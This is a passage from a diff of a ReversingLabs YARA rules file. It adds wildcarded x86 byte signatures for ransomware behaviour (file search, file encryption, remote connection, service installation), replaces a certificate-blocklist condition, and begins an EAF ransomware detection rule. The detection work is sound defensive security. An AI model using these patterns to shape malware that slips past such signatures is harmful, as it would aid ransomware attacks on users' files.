+            45 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 44 24 ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8
+            ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8D 45
+            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ??
+            ?? ?? 75 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 39 45 ?? 77 ?? 8D 45 ??
+            89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 8D 45 ?? 8D 4D ?? 89 4C 24 ?? 89 14 24 89 C1 E8
+            ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC
+            ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 45 ??
+            ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 81 7D ?? ?? ?? ?? ?? 75 ?? E9 ??
+            ?? ?? ?? 8D 45 ?? 83 C0 ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 8B 45 ??
+            05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8
+            ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 90 8D 45 ?? 89
+            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89
+            C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 89 D8 89 04 24 E8 ?? ??
+            ?? ?? 90 8B 5D ?? C9 C2
+        }
+		$remote_connection_2 = {
+            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
+            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
+            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
+            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
+            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
+            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
+            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
+            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2
+        }
+		$encrypt_files_3 = {
+            55 57 56 53 83 EC ?? 8B 41 ?? 85 C0 75 ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 89 F0 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 89 CB C7 44 24 ?? ?? ?? ?? ??
+            8D 54 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 FF
+            15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ??
+            ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ??
+            83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85
+            C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ??
+            83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B
+            84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
+            E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ??
+            ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89
+            44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24
+            ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24 ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ??
+            89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24 ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89
+            5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F 94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85
+            C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89
+            6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 2B 74 24 ?? 1B
+            7C 24 ?? 89 FA 09 F2 74 ?? 8B 44 24 ?? 8B 58 ?? B8 ?? ?? ?? ?? 39 F8 0F 82 ?? ?? ??
+            ?? 39 F3 0F 47 DE E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 DE EB ?? 8B 7C 24 ?? BE ?? ?? ?? ??
+            85 ED 74 ?? 89 2C 24 E8 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 0F 84 ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? EB
+        }
+		$encrypt_files_4 = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            34 24 89 54 24 ?? 89 44 24 ?? 89 4C 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 29 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 19 95 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 D0 89 CA 09 C2 0F 84 ?? ?? ?? ?? 31 D2 3B 95 ??
+            ?? ?? ?? 8B 43 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 72 ?? 77 ?? 8B 8D ?? ?? ?? ??
+            39 C8 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 89 44 24 ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? 89 54 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 89 34 24 8B 35 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 83 EC
+            ?? 89 04 24 FF D6 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 FF 15 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 83 EC ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88 ?? ?? ?? ?? 85 C9 74 ?? 8B 01 C7
+            04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            83 EC ?? 89 C1 E8 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            89 04 24 FF 15
+        }
+		$search_files_3 = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 8B 85
+            ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 FF D7 83
+            EC ?? 85 C0 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? EB ?? 90 8D B4 26 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 83 C3 ?? 8B 50 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 29 D0 C1 F8 ?? 69 C0 ??
+            ?? ?? ?? 39 C3 0F 83 ?? ?? ?? ?? 8D 04 5B 8D 34 C5 ?? ?? ?? ?? 8B 04 C2 89 44 24 ??
+            8B 85 ?? ?? ?? ?? 89 04 24 FF D7 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? 8B
+            1C 30 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 5C
+            24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 40 ?? 8B 88
+            ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 C7 04 24 ?? ?? ?? ?? FF 50 ?? 83 EC ?? 0F
+            B7 C0 B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 C1 E8 ?? ?? ?? ?? 31 F6 E9
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 5C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 90 8D 74 26 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
+            E8
+        }
+		$install_service = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 89 C1 89 44 24 ?? 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0
+            89 C3 0F 84 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? 8D 6C 24 ?? 8D 7C 24 ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 7C 24 ?? 89 44 24 ?? FF D0 83 EC
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 83 E0 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? 89 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ?? 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8
+            ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ?? 81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ??
+            ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC
+            ?? 85 C0 74 ?? 3B 74 24 ?? 8B 44 24 ?? 72 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? 89
+            1C 24 8B 1D ?? ?? ?? ?? FF D3 83 EC ?? 8B 44 24 ?? 89 04 24 FF D3 83 EC ?? 83 C4 ??
+            5B 5E 5F 5D C2 ?? ?? 8D B4 26 ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83
+            EC ?? 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 8D B6 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? 89 1C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 89 6C 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ??
+            85 C0 0F 84 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8B 44 24 ?? FF D0 8B 74 24 ?? 89 44 24 ??
+            83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? F7 64 24 ?? B8 ?? ?? ?? ?? C1 EA ??
+            81 FA ?? ?? ?? ?? 0F 47 D0 B8 ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 42 D0 89 14 24 FF 15
+            ?? ?? ?? ?? 83 EC ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? C7 44 24 ?? ??
+            ?? ?? ?? 89 1C 24 FF 54 24 ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? 3B 74 24 ?? 72 ?? 8B
+            44 24 ?? FF D0 2B 44 24 ?? 3B 44 24 ?? 76 ?? E9
+        }
+		$encrypt_files_5 = {
+            FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF
+            15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89
+            14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
+            ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
+            ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24
+            ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89
+            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ??
+            89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC
+            ?? 89 C6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 8B 0D ?? ?? ?? ?? 89 4C 24
+            ?? 89 7C 24 ?? 89 C6 89 D7 89 5C 24 ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44
+            24 ?? 89 44 24 ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 8B 4C 24 ?? 89 0C 24 FF 54 24
+            ?? 83 EC ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 89 5C 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 2C 24
+            E8 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 44 24
+            ?? 8D 44 24 ?? 89 44 24 ?? 89 6C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 DA 31 F2 09 FA 0F
+            94 C0 0F B6 C0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ??
+            ?? ?? 83 EC ?? 89 C3 FF 15 ?? ?? ?? ?? 85 C0 78 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 44 24
+            ?? 89 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 89 0C 24 FF 15
+        }
+		$search_files_4 = {
+            FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ??
+            83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B
+            00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ??
+            ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ??
+            ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
+            89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89
+            04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ??
+            ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 3B BD ??
+            ?? ?? ?? 75 ?? EB ?? 83 EC ?? 83 C7 ?? 39 BD ?? ?? ?? ?? 74 ?? 8B 45 ?? 89 44 24 ??
+            89 3C 24 89 D9 E8 ?? ?? ?? ?? EB ?? BE ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ??
+            ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 F0 8D 65 ?? 5B 5E 5F 5D C2
+        }
+		$remote_connection_3 = {
+            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
+            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
+            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
+            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
+            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
+            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
+            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
+            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
+            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
+            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ??
+            ?? 89 C3 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 89 1C 24 E8 ?? ?? ?? ?? 89 C3 EB ?? 53 83 EC ?? 8B 5C 24 ?? 8D 43 ?? 89 04 24 8B
+            0B E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 5B C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Garena Online Pte Ltd" and pe.signatures [ i ] . serial == "28:80:a7:f7:ff:2d:33:4a:a0:87:44:a8:75:4f:ab:2c" and 1393891199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $search_files and $encrypt_files and $remote_connection ) or ( $encrypt_files_2 and $remote_connection and $search_files ) or ( $search_files_2 and $encrypt_files_3 and $remote_connection_2 ) or ( $install_service and $search_files_3 and $encrypt_files_4 ) or ( $search_files_4 and $encrypt_files_5 and $remote_connection_3 ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0492F5C18E26Fa0Cd7E15067674Aff1C : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_EAF : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects EAF ransomware."
 		author = "ReversingLabs"
-		id = "6a176d4a-5d3e-5184-b923-12d561e7034a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "6903030e-b1a1-5238-b377-ce8e4b18d3f3"
+		date = "2022-07-22"
+		modified = "2022-07-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1762-L1778"
